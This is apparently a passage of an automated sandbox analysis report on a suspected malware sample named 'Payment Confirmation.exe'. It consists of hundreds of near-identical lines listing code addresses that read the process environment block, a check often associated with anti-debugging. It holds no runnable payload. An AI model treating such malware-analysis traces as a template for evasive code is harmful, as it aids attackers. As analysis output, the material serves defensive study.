                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A563C0 mov eax, dword ptr fs:[00000030h]7_2_01A563C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE3F0 mov eax, dword ptr fs:[00000030h]7_2_019EE3F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE3F0 mov eax, dword ptr fs:[00000030h]7_2_019EE3F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE3F0 mov eax, dword ptr fs:[00000030h]7_2_019EE3F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A743D4 mov eax, dword ptr fs:[00000030h]7_2_01A743D4
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A743D4 mov eax, dword ptr fs:[00000030h]7_2_01A743D4
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E3DB mov eax, dword ptr fs:[00000030h]7_2_01A7E3DB
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E3DB mov eax, dword ptr fs:[00000030h]7_2_01A7E3DB
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E3DB mov ecx, dword ptr fs:[00000030h]7_2_01A7E3DB
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E3DB mov eax, dword ptr fs:[00000030h]7_2_01A7E3DB
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CC310 mov ecx, dword ptr fs:[00000030h]7_2_019CC310
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA8324 mov eax, dword ptr fs:[00000030h]7_2_01AA8324
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA8324 mov ecx, dword ptr fs:[00000030h]7_2_01AA8324
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA8324 mov eax, dword ptr fs:[00000030h]7_2_01AA8324
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA8324 mov eax, dword ptr fs:[00000030h]7_2_01AA8324
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F0310 mov ecx, dword ptr fs:[00000030h]7_2_019F0310
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A30B mov eax, dword ptr fs:[00000030h]7_2_01A0A30B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A30B mov eax, dword ptr fs:[00000030h]7_2_01A0A30B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A30B mov eax, dword ptr fs:[00000030h]7_2_01A0A30B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7437C mov eax, dword ptr fs:[00000030h]7_2_01A7437C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA634F mov eax, dword ptr fs:[00000030h]7_2_01AA634F
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A78350 mov ecx, dword ptr fs:[00000030h]7_2_01A78350
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5035C mov eax, dword ptr fs:[00000030h]7_2_01A5035C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5035C mov eax, dword ptr fs:[00000030h]7_2_01A5035C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5035C mov eax, dword ptr fs:[00000030h]7_2_01A5035C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5035C mov ecx, dword ptr fs:[00000030h]7_2_01A5035C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5035C mov eax, dword ptr fs:[00000030h]7_2_01A5035C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5035C mov eax, dword ptr fs:[00000030h]7_2_01A5035C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9A352 mov eax, dword ptr fs:[00000030h]7_2_01A9A352
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A662A0 mov eax, dword ptr fs:[00000030h]7_2_01A662A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A662A0 mov ecx, dword ptr fs:[00000030h]7_2_01A662A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A662A0 mov eax, dword ptr fs:[00000030h]7_2_01A662A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A662A0 mov eax, dword ptr fs:[00000030h]7_2_01A662A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A662A0 mov eax, dword ptr fs:[00000030h]7_2_01A662A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A662A0 mov eax, dword ptr fs:[00000030h]7_2_01A662A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E284 mov eax, dword ptr fs:[00000030h]7_2_01A0E284
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E284 mov eax, dword ptr fs:[00000030h]7_2_01A0E284
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A50283 mov eax, dword ptr fs:[00000030h]7_2_01A50283
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A50283 mov eax, dword ptr fs:[00000030h]7_2_01A50283
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A50283 mov eax, dword ptr fs:[00000030h]7_2_01A50283
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E02A0 mov eax, dword ptr fs:[00000030h]7_2_019E02A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E02A0 mov eax, dword ptr fs:[00000030h]7_2_019E02A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA2C3 mov eax, dword ptr fs:[00000030h]7_2_019DA2C3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA2C3 mov eax, dword ptr fs:[00000030h]7_2_019DA2C3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA2C3 mov eax, dword ptr fs:[00000030h]7_2_019DA2C3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA2C3 mov eax, dword ptr fs:[00000030h]7_2_019DA2C3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA2C3 mov eax, dword ptr fs:[00000030h]7_2_019DA2C3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA62D6 mov eax, dword ptr fs:[00000030h]7_2_01AA62D6
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E02E1 mov eax, dword ptr fs:[00000030h]7_2_019E02E1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E02E1 mov eax, dword ptr fs:[00000030h]7_2_019E02E1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E02E1 mov eax, dword ptr fs:[00000030h]7_2_019E02E1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C823B mov eax, dword ptr fs:[00000030h]7_2_019C823B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D6259 mov eax, dword ptr fs:[00000030h]7_2_019D6259
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CA250 mov eax, dword ptr fs:[00000030h]7_2_019CA250
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A58243 mov eax, dword ptr fs:[00000030h]7_2_01A58243
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A58243 mov ecx, dword ptr fs:[00000030h]7_2_01A58243
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C826B mov eax, dword ptr fs:[00000030h]7_2_019C826B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA625D mov eax, dword ptr fs:[00000030h]7_2_01AA625D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A8A250 mov eax, dword ptr fs:[00000030h]7_2_01A8A250
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A8A250 mov eax, dword ptr fs:[00000030h]7_2_01A8A250
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D4260 mov eax, dword ptr fs:[00000030h]7_2_019D4260
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D4260 mov eax, dword ptr fs:[00000030h]7_2_019D4260
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D4260 mov eax, dword ptr fs:[00000030h]7_2_019D4260
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A505A7 mov eax, dword ptr fs:[00000030h]7_2_01A505A7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A505A7 mov eax, dword ptr fs:[00000030h]7_2_01A505A7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A505A7 mov eax, dword ptr fs:[00000030h]7_2_01A505A7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D2582 mov eax, dword ptr fs:[00000030h]7_2_019D2582
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D2582 mov ecx, dword ptr fs:[00000030h]7_2_019D2582
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A04588 mov eax, dword ptr fs:[00000030h]7_2_01A04588
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F45B1 mov eax, dword ptr fs:[00000030h]7_2_019F45B1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F45B1 mov eax, dword ptr fs:[00000030h]7_2_019F45B1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E59C mov eax, dword ptr fs:[00000030h]7_2_01A0E59C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D65D0 mov eax, dword ptr fs:[00000030h]7_2_019D65D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0C5ED mov eax, dword ptr fs:[00000030h]7_2_01A0C5ED
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0C5ED mov eax, dword ptr fs:[00000030h]7_2_01A0C5ED
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E5CF mov eax, dword ptr fs:[00000030h]7_2_01A0E5CF
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E5CF mov eax, dword ptr fs:[00000030h]7_2_01A0E5CF
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A5D0 mov eax, dword ptr fs:[00000030h]7_2_01A0A5D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A5D0 mov eax, dword ptr fs:[00000030h]7_2_01A0A5D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D25E0 mov eax, dword ptr fs:[00000030h]7_2_019D25E0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE53E mov eax, dword ptr fs:[00000030h]7_2_019FE53E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE53E mov eax, dword ptr fs:[00000030h]7_2_019FE53E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE53E mov eax, dword ptr fs:[00000030h]7_2_019FE53E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE53E mov eax, dword ptr fs:[00000030h]7_2_019FE53E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE53E mov eax, dword ptr fs:[00000030h]7_2_019FE53E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A66500 mov eax, dword ptr fs:[00000030h]7_2_01A66500
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4500 mov eax, dword ptr fs:[00000030h]7_2_01AA4500
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4500 mov eax, dword ptr fs:[00000030h]7_2_01AA4500
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01AA4500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019E0535 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A0656A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019D8550 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A044B0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A5A4B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A8A49A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019D64AB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019D04E5 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A56420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A0A430 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A08402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019CC427 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019CE420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019C645D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019F245A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A5C460 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A0E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019FA470 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A8A456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A847A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A7678E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019D07AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A5E7E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019DC7C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A507C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019D47FB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019F27ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A0C720 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019D0710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A4C730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A0273C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A0273C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A0C700 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A00710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019D0750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A0674D mov esi, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A0674D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019D8770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019E0770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A54755 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A12750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A5E75D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A0C6A6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019D4690 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A066B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A506F1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A4E6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A0A6C7 mov ebx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A0A6C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A06620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A08620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019E260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A4E609 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019D262C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A12619 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019EE627 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A0A660 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A9866E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A02674 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019EC640 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A589B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A589B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019D09AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019E29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A5E9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019DA9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A029F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A669C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A049D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A9A9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019C8918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A6892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A5892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A4E908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A5C912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A1096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A1096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A5C97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A74978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A50946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01AA4940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019F6962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019D0887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A5C89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A9A8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A0C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019FE8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01AA08C0 mov eax, dword ptr fs:[00000030h]
